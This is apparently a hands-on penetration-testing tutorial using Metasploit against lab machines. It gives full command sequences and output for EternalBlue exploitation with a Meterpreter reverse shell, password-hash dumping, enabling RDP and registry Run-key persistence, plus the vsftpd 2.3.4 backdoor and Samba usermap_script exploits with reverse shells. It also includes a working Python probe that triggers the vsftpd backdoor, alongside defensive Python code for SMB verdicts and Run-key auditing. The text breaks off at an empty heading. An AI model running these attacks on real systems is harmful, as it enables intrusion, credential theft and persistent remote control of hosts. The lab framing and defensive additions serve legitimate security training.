
Mastering the Metasploit Framework: Hands-On Network Attack and Defense with Full-Chain Penetration Testing

1. Step by step: EternalBlue (MS17-010) attack and defense in detail

1.1 Vulnerability background and core principle

Vulnerability identifier: MS17-010 (CVE-2017-0144; the same bulletin covers CVE-2017-0143 and CVE-2017-0145 through CVE-2017-0148)

Affected systems: Windows Vista/7/8.1/10 and Windows Server 2008/2008 R2/2012/2012 R2/2016; Microsoft later shipped out-of-band fixes for the unsupported Windows XP and Server 2003 as well

Vulnerability type: remote code execution in the SMBv1 server driver (srv.sys)

Severity: Critical in the Microsoft bulletin; NVD scores CVE-2017-0144 at CVSS v3 8.1 (High) and CVSS v2 9.3

EternalBlue lives in the SMBv1 server driver: a crafted sequence of SMB transaction requests corrupts the kernel non-paged pool and lets an unauthenticated attacker on the network execute code in the kernel and take full control of the target. Microsoft patched it on 14 March 2017; the exploit was published by the Shadow Brokers in April 2017 and became the propagation mechanism of the "WannaCry" ransomware in May 2017, which spread worldwide within a day.

1.2 Environment setup

Attacker setup:

# 1. Attacker machine (Kali Linux)
# Check the network configuration (ifconfig is deprecated on current Kali; use the ip tool)
ip addr show eth0
# Make sure the IP address is 192.168.1.10
# 2. Install the required tools
sudo apt update
sudo apt install metasploit-framework -y
# 3. Start the Metasploit database
sudo systemctl start postgresql
sudo msfdb init

Target setup:

Target: Windows 7 SP1 (x64)
Requirements:
- Windows Firewall disabled (or TCP 445 allowed inbound)
- Port 445 reachable from the attacker
- The March 2017 fixes KB4012212 (security-only) / KB4012215 (monthly rollup) NOT installed; check with: wmic qfe get HotFixID | findstr /i "4012212 4012215"
- IP address: 192.168.1.100

Keep both VMs on an isolated (host-only) virtual network: a failed EternalBlue attempt can blue-screen the target, and an unpatched host on a shared network is wormable.

1.3 Attack walkthrough

Step 1: Start MSF and search for the relevant modules

# Start the MSF console
msfconsole
# Search for the EternalBlue modules from the MSF console
msf6 > search ms17_010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Explanation: three relevant modules are shown (a current install also lists auxiliary/admin/smb/ms17_010_command and a few more):

  • Module 0: the EternalBlue exploit itself (kernel pool corruption; ranked "average" because a failed attempt can crash the target)

  • Module 1: the vulnerability scanner, which only probes and never exploits

  • Module 2: the EternalRomance/EternalSynergy/EternalChampion variant, which writes and runs a service binary psexec-style; it is more stable than EternalBlue but needs an accessible named pipe (anonymously on many Windows 7 hosts, otherwise with credentials)

Step 2: Confirm the vulnerability with the scanner module

# Select the scanner module
msf6 > use auxiliary/scanner/smb/smb_ms17_010
# Show the module options
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        (Optional) The Windows domain to use for authentication
   SMBPass                     no        (Optional) The password for the specified username
   SMBUser                     no        (Optional) The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

# Set the target IP
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
# Run the scan
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.1.100:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.100:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Interpreting the result

  • "Host is likely VULNERABLE to MS17-010!" means the target is unpatched. The scanner opens an anonymous SMBv1 session and sends a PeekNamedPipe transaction on file ID 0; an unpatched srv.sys answers with NT status STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), while a patched host answers with a different status (STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE).

  • "Host does NOT appear vulnerable" means the March 2017 fix is installed.

  • If SMBv1 is disabled on the host, the probe cannot be sent at all; the module reports a connection error rather than a verdict, which is the outcome a defender wants.

  • The same scanner also reports hosts that are already infected with the DoublePulsar backdoor, which an earlier attacker may have left behind.
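The decision rule the scanner applies, written out as an added Python example (my code, not Metasploit's): it parses the SMBv1 header of a reply to the PeekNamedPipe probe and classifies it the way smb_ms17_010 does, and adds the DoublePulsar multiplex-ID check. The network side (negotiate, session setup, tree connect to IPC$) is not included; the sample replies are constructed with build_smb1_reply, and the status values and the 0x51 multiplex ID are the ones the scanner keys on.

```python
import struct

# NT status values that the MS17-010 probe (a PeekNamedPipe transaction on FID 0 over
# an anonymous SMBv1 session) elicits from srv.sys.
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched: the FID 0 lookup hits the buggy path
STATUS_ACCESS_DENIED = 0xC0000022            # patched hosts
STATUS_INVALID_HANDLE = 0xC0000008           # patched hosts (some builds)

SMB1_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION = 0x25
SMB_COM_TRANSACTION2 = 0x32
DOUBLEPULSAR_MID = 0x51  # a TRANS2 SESSION_SETUP reply normally echoes multiplex ID 0x41


def parse_smb1_header(packet: bytes) -> dict:
    """Split a NetBIOS-framed SMBv1 reply into its 32-byte header fields."""
    if len(packet) < 36:
        raise ValueError("packet too short for NetBIOS + SMB header")
    nb_length = int.from_bytes(packet[1:4], "big")   # byte 0 is the NetBIOS message type
    hdr = packet[4:36]
    if hdr[:4] != SMB1_MAGIC:
        raise ValueError("not an SMBv1 header")
    command, status, flags, flags2 = struct.unpack_from("<BIBH", hdr, 4)
    tid, pid, uid, mid = struct.unpack_from("<HHHH", hdr, 24)
    return {"nb_length": nb_length, "command": command, "status": status, "flags": flags,
            "flags2": flags2, "tid": tid, "pid": pid, "uid": uid, "mid": mid}


def classify_ms17_010(status: int) -> str:
    """Apply the scanner's decision rule to the NT status of the PeekNamedPipe reply."""
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "NOT VULNERABLE"
    return f"UNKNOWN (NT status 0x{status:08X})"


def assess_probe_reply(packet: bytes) -> str:
    """Verdict for a captured reply to the PeekNamedPipe probe."""
    hdr = parse_smb1_header(packet)
    if hdr["command"] != SMB_COM_TRANSACTION:
        return f"UNEXPECTED (command 0x{hdr['command']:02X}, not a TRANSACTION reply)"
    return classify_ms17_010(hdr["status"])


def doublepulsar_present(packet: bytes) -> bool:
    """DoublePulsar hooks TRANS2 SESSION_SETUP and answers with multiplex ID 0x51 instead of 0x41."""
    hdr = parse_smb1_header(packet)
    return hdr["command"] == SMB_COM_TRANSACTION2 and hdr["mid"] == DOUBLEPULSAR_MID


def build_smb1_reply(command: int, status: int, mid: int = 0x41) -> bytes:
    """Constructed minimal reply (empty parameter/data blocks) used as sample input below."""
    hdr = (SMB1_MAGIC
           + struct.pack("<BIBH", command, status, 0x98, 0xC807)  # flags: reply; flags2: NT status, unicode
           + b"\x00" * 12                                         # PIDHigh, SecurityFeatures, Reserved
           + struct.pack("<HHHH", 0, 0xFEFF, 0x0800, mid))        # TID, PIDLow, UID, MID
    body = b"\x00\x00\x00"                                         # WordCount = 0, ByteCount = 0
    return b"\x00" + len(hdr + body).to_bytes(3, "big") + hdr + body


if __name__ == "__main__":
    samples = [
        ("unpatched Windows 7", build_smb1_reply(SMB_COM_TRANSACTION, STATUS_INSUFF_SERVER_RESOURCES)),
        ("patched Windows 7", build_smb1_reply(SMB_COM_TRANSACTION, STATUS_ACCESS_DENIED)),
    ]
    for label, pkt in samples:
        print(f"{label}: {assess_probe_reply(pkt)}")
    print("DoublePulsar:", doublepulsar_present(build_smb1_reply(SMB_COM_TRANSACTION2, 0, mid=0x51)))
```

The same parser works on packets pulled out of a pcap (strip the Ethernet/IP/TCP headers first), which is how a defender can confirm after the fact what a scanner concluded about a host.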

Step 3: Select the EternalBlue exploit module

# Go back to the top level
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
# Select the EternalBlue exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# Show the module details
msf6 exploit(windows/smb/ms17_010_eternalblue) > info

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14
Step 4: Configure the exploit

# Show the options that must be set
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

# Set the target IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
# List the compatible payloads (excerpt)
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads

Compatible Payloads
===================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  generic/custom                                        normal  No     Custom Payload
   1  generic/shell_bind_tcp                                normal  No     Generic Command Shell, Bind TCP Inline
   2  generic/shell_reverse_tcp                             normal  No     Generic Command Shell, Reverse TCP Inline
   3  windows/x64/meterpreter/bind_tcp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   4  windows/x64/meterpreter/reverse_tcp                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager

# Choose the x64 Meterpreter reverse TCP payload; the target is x64 and the module only offers x64 payloads for it
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
# Show the payload options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):
   (same table as above, with RHOSTS now 192.168.1.100)

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

# Set the attacker IP and port
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
Step 5: Run the exploit

# Run the exploit. A failed attempt can blue-screen the target; the module retries up to MaxExploitAttempts (default 3) times
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] 192.168.1.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.1.100:445 - Connecting to target for exploitation.
[+] 192.168.1.100:445 - Connection established for exploitation.
[+] 192.168.1.100:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.100:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.100:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.100:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.1.100:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 192.168.1.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.100:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.100:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.100:445 - Starting non-paged pool grooming
[+] 192.168.1.100:445 - Sending SMBv2 buffers
[+] 192.168.1.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.100:445 - Sending final SMBv2 buffers.
[*] 192.168.1.100:445 - Sending last fragment of exploit packet
[*] 192.168.1.100:445 - Receiving response from exploit packet
[+] 192.168.1.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.100:445 - Sending egg to corrupted connection.
[*] 192.168.1.100:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.100:49158) at 2023-10-01 10:00:00 +0800
[+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

What happened, step by step

  1. The reverse TCP handler is started on the attacker

  2. The built-in check confirms the target is vulnerable (same probe as the scanner module)

  3. SMB connections are established (an SMBv1 connection for the overflow and SMBv2 connections for the pool grooming)

  4. The oversized transaction is sent in fragments, and the non-paged pool is groomed so that an SMBv2 buffer sits right after the hole the exploit will overflow into

  5. The final fragment triggers the overflow in srv.sys, which corrupts the adjacent SMBv2 buffer (the status 0xC000000D, STATUS_INVALID_PARAMETER, in the reply is the expected sign of success)

  6. The "egg" (kernel shellcode) is sent through the corrupted connection; it injects the user-mode payload into a SYSTEM process, normally spoolsv.exe

  7. The payload stager connects back, the Meterpreter stage is sent, and the session opens

1.4 Working in the Meterpreter session

With a Meterpreter session you can run the usual post-exploitation steps:

# 1. System information
meterpreter > sysinfo
Computer        : WIN7-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
# 2. Current privileges (the kernel exploit lands you in a SYSTEM process, so no escalation is needed)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# 3. Process list
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                 Path
 ---   ----  ----              ----  -------  ----                 ----
 0     0     [System Process]
 4     0     System            x64   0
 264   4     smss.exe          x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\smss.exe
 332   324   csrss.exe         x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\csrss.exe
 384   376   csrss.exe         x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\csrss.exe
 ...

# 4. Migrate to a stable process. The kernel shellcode injected the payload into spoolsv.exe; if that host process dies, the session dies with it, so move into a long-lived SYSTEM process. Migration does not hide you: it creates a remote thread in another process, which is exactly the behaviour EDR products alert on.
meterpreter > getpid
Current pid: 3724
meterpreter > migrate 656
[*] Migrating from 3724 to 656...
[*] Migration completed successfully.
# 5. Screenshot
meterpreter > screenshot
Screenshot saved to: /root/WjVfJmhT.jpeg
# View it with: xdg-open /root/WjVfJmhT.jpeg
# 6. Dump the password hashes from the SAM (needs SYSTEM). aad3b435b51404eeaad3b435b51404ee is the empty LM hash and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, i.e. these lab accounts have no password.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# 7. Enable Remote Desktop
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20231001100000_default_192.168.1.100_host.windows.cle_123456.txt

1.5 Installing persistence

# 1. Install an autorun agent with the (legacy) persistence Meterpreter script
meterpreter > run persistence -X -i 60 -p 4444 -r 192.168.1.10
[*] Running Persistence Script
[*] Resource file for cleanup created: /root/.msf4/logs/persistence/WIN7-PC_20231001.1000.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444
[*] Persistent agent script is 99627 bytes long
[+] Persistent Script written to C:\Windows\TEMP\default.exe
[*] Executing script C:\Windows\TEMP\default.exe
[+] Agent executed with PID 4084
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QfVhLzVlWXv
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QfVhLzVlWXv

Parameter notes

  • -X: start the agent at system boot by registering it under the HKLM Run key (needs admin/SYSTEM, which this session has). -U would register it under HKCU instead; because this session runs as SYSTEM, HKCU resolves to HKEY_USERS\.DEFAULT, so a -U entry would never fire at an interactive user's logon.

  • -i 60: try to reconnect every 60 seconds

  • -p 4444: port of the listener

  • -r 192.168.1.10: attacker IP address. The listener is exploit/multi/handler with the same payload, LHOST and LPORT; set ExitOnSession false so it keeps accepting callbacks after the first one.

This script has been deprecated for years and may not be present in a current install; the maintained equivalents are exploit/windows/local/persistence (Run-key persistence, same idea) and post/windows/manage/persistence_exe (upload an arbitrary executable and register it). The agent is an unencoded x86 Meterpreter dropped under C:\Windows\TEMP, which every current AV product detects; it survives only on hosts without endpoint protection, as in this lab.

1.6 Cleaning up

# 1. Look up the persistence entry that was created
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v QfVhLzVlWXv
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Name: QfVhLzVlWXv
Data: C:\Windows\TEMP\default.exe
# 2. Delete the registry value
meterpreter > reg deleteval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v QfVhLzVlWXv
[*] Deleted QfVhLzVlWXv from HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# 3. Kill the running agent (PID from the installation output), then remove the executable
meterpreter > kill 4084
meterpreter > rm C:\\Windows\\TEMP\\default.exe

The installation also wrote a cleanup resource file (the path printed when the script ran); running it from msfconsole with resource <path> performs the same steps. Deleting the Run value and the file restores the host's configuration; it does not erase the evidence (event logs, prefetch entries, registry transaction logs), and on an authorized test you should not try to. Record every change you made and hand the list to the system owner.
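Seen from the defender's side, the persistence above leaves exactly two artefacts: a Run-key value with a random name and an executable under C:\Windows\TEMP. The following added Python example (my code, not from the page or from Metasploit) parses a `reg export` of the Run keys and flags such entries. The sample export is constructed to match the lab host plus two benign entries; the directory list and the "random-looking name" heuristic are my own assumptions, not a Windows rule. Real .reg exports are UTF-16LE with a BOM, so read them with open(path, encoding="utf-16") before passing the text in.

```python
import re
from typing import Dict, List

# One value line of a .reg export:  "ValueName"="C:\\path\\file.exe"  (backslashes and quotes escaped)
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)+)"="((?:[^"\\]|\\.)*)"$')

# Directories an autorun entry should almost never point into on a managed host (assumed list)
SUSPICIOUS_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\users\\public\\")


def _unescape(s: str) -> str:
    """Undo .reg escaping: \\\\ -> \\ and \\" -> "."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_run_key_export(text: str) -> List[Dict[str, str]]:
    """Return one record per value under any ...\\CurrentVersion\\Run* key in the export."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and "\\CurrentVersion\\Run" in key:
            m = VALUE_RE.match(line)
            if m:
                entries.append({"key": key, "name": _unescape(m.group(1)), "command": _unescape(m.group(2))})
    return entries


def executable_path(command: str) -> str:
    """Program path from a command line: the quoted first token, else everything up to '.exe'."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    m = re.match(r"(.+?\.exe)", cmd, re.IGNORECASE)
    return m.group(1) if m else cmd.split(" ", 1)[0]


def looks_random(name: str) -> bool:
    """Heuristic for Rex::Text.rand_text_alpha-style names: letters only, many upper/lower flips."""
    if not name.isalpha() or len(name) < 8:
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= 4


def audit_run_keys(text: str) -> List[Dict[str, object]]:
    """Flag entries whose program lives in a temp/public directory or whose name looks random."""
    findings = []
    for e in parse_run_key_export(text):
        path = executable_path(e["command"])
        reasons = []
        if any(d in path.lower() for d in SUSPICIOUS_DIRS):
            reasons.append("executable in a temp/public directory")
        if looks_random(e["name"]):
            reasons.append("random-looking value name")
        if reasons:
            findings.append({**e, "path": path, "reasons": reasons})
    return findings


# Constructed sample of what `reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run run.reg`
# contains on the lab target after the persistence step, plus two benign entries.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr"
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"QfVhLzVlWXv"="C:\\Windows\\TEMP\\default.exe"
'''

if __name__ == "__main__":
    for f in audit_run_keys(SAMPLE_EXPORT):
        print(f"{f['name']!r} -> {f['path']}: {', '.join(f['reasons'])}")
```

Both heuristics are cheap and produce false positives on some legitimate software; their value is in narrowing a few hundred autorun entries on a fleet down to the handful worth a look.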

2. Linux target: Metasploitable 2 attack and defense

2.1 The target: Metasploitable 2

Metasploitable 2 is an intentionally vulnerable Ubuntu 8.04 VM built for penetration-testing practice. It ships with many vulnerable services, among them:

Main services

  • FTP (vsftpd 2.3.4, the backdoored release)

  • SSH (OpenSSH 4.7p1)

  • Telnet

  • SMTP (Postfix)

  • HTTP (Apache 2.2.8)

  • Samba (3.0.20-Debian)

  • MySQL

  • PostgreSQL

  • and others

IP address: 192.168.1.150

2.2 Exploiting the vsftpd 2.3.4 backdoor

# 1. Search for vsftpd modules
msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  Yes    VSFTPD v2.3.4 Backdoor Command Execution

# 2. Select the exploit module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
# 3. Show the module information
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03

# 4. Show the options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

# 5. Set the target IP
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.150
RHOSTS => 192.168.1.150
# 6. Run the exploit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.1.150:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.150:21 - USER: 331 Please specify the password.
[+] 192.168.1.150:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.150:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.1.10:4444 -> 192.168.1.150:6200) at 2023-10-01 10:30:00 +0800

# 7. Verify the privileges (this is a raw command shell with no prompt)
whoami
root
pwd
/
ls -la

Vulnerability explanation

The vsftpd 2.3.4 tarball served from the project's download site was tampered with for a few days around the end of June 2011 (the backdoor was discovered on 3 July 2011); the upstream source never contained it. In the tampered build, a login user name containing the two characters ":)" makes the daemon bind a listener on TCP port 6200 and hand whoever connects a root shell (/bin/sh). The MSF module first checks whether 6200 is already open, otherwise sends such a USER/PASS pair, connects to 6200 and turns that connection into the session shown above; no reverse handler is involved. The listener serves a single connection, so a successful probe consumes it, but a triggered and unused backdoor stays open for anyone on the network.
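To see the backdoor's protocol exchange end to end, here is an added Python example (my code, not the page's or Metasploit's) that performs the same probe the exploit module does, with a constructed loopback stand-in for the backdoored daemon so it runs offline. The user name "lab:)" and the ports other than 21 and 6200 are assumptions. Against a real host this probe IS exploitation: once armed, the listener hands a root shell to the first client on port 6200, so run it only against authorized targets and always let the probe connect so that it consumes the shell rather than leaving it open.

```python
import socket
import threading
import time

BACKDOOR_PORT = 6200          # the tampered daemon listens here once armed
TRIGGER_USER = b"lab:)"       # assumed user name; only the ":)" matters


def _recv_line(sock, limit=1024):
    """Read one newline-terminated line; FTP replies and the shell's output are line based."""
    buf = b""
    while not buf.endswith(b"\n") and len(buf) < limit:
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf


def _try_shell(host, port, timeout):
    """Connect to the backdoor port and run `id`; None if nothing answers."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"id\n")
            return _recv_line(s).decode(errors="replace").strip() or None
    except OSError:
        return None


def probe_vsftpd_backdoor(host, ftp_port=21, shell_port=BACKDOOR_PORT, timeout=3.0):
    """Same exchange as exploit/unix/ftp/vsftpd_234_backdoor: USER with ':)', PASS, then port 6200."""
    already = _try_shell(host, shell_port, timeout)
    if already:
        return f"BACKDOOR ALREADY ARMED: {already}"
    with socket.create_connection((host, ftp_port), timeout=timeout) as ftp:
        banner = _recv_line(ftp).decode(errors="replace").strip()
        if "vsFTPd 2.3.4" not in banner:
            return f"NOT vsFTPd 2.3.4 (banner: {banner})"
        ftp.sendall(b"USER " + TRIGGER_USER + b"\r\n")
        _recv_line(ftp)                     # 331 Please specify the password.
        ftp.sendall(b"PASS lab\r\n")        # the backdoored daemon never answers this
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:  # the listener appears a moment later
            output = _try_shell(host, shell_port, timeout)
            if output:
                return f"VULNERABLE: {output}"
            time.sleep(0.2)
    return f"NOT VULNERABLE (banner matched but nothing listened on port {shell_port})"


class FakeVsftpd234(threading.Thread):
    """Constructed loopback stand-in for the backdoored daemon so the probe can run offline."""

    def __init__(self):
        super().__init__(daemon=True)
        self.ftp = socket.socket()
        self.ftp.bind(("127.0.0.1", 0))
        self.ftp.listen(1)
        self.ftp_port = self.ftp.getsockname()[1]
        spare = socket.socket()                       # pick a free port to stand in for 6200
        spare.bind(("127.0.0.1", 0))
        self.shell_port = spare.getsockname()[1]
        spare.close()

    def run(self):
        conn, _ = self.ftp.accept()
        with conn:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user = _recv_line(conn)
            conn.sendall(b"331 Please specify the password.\r\n")
            _recv_line(conn)                          # PASS
            if b":)" in user:
                self._serve_one_shell()               # real daemon: bind 6200, accept, exec /bin/sh
            else:
                conn.sendall(b"530 Login incorrect.\r\n")

    def _serve_one_shell(self):
        srv = socket.socket()
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("127.0.0.1", self.shell_port))
        srv.listen(1)
        client, _ = srv.accept()                      # one client only, like the exec'd shell
        with client:
            if _recv_line(client).strip() == b"id":
                client.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n")
        srv.close()


def run_lab_demo():
    """Start the stand-in and probe it; returns the verdict string."""
    daemon = FakeVsftpd234()
    daemon.start()
    return probe_vsftpd_backdoor("127.0.0.1", daemon.ftp_port, daemon.shell_port, timeout=5.0)


if __name__ == "__main__":
    print(run_lab_demo())
```

The pre-check on the shell port mirrors what the MSF module does and also catches the case where another party has already armed the backdoor, which on a shared lab network happens more often than one would expect.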

2.3 Exploiting Samba (usermap_script, CVE-2007-2447)

# 1. Search for Samba modules
msf6 > search samba
# 2. Select the usermap_script exploit
msf6 > use exploit/multi/samba/usermap_script
# 3. Configure it
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.150
RHOSTS => 192.168.1.150
msf6 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
# 4. Run it
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Command shell session 3 opened (192.168.1.10:4444 -> 192.168.1.150:56728) at 2023-10-01 10:50:00 +0800

whoami
root

Vulnerability explanation

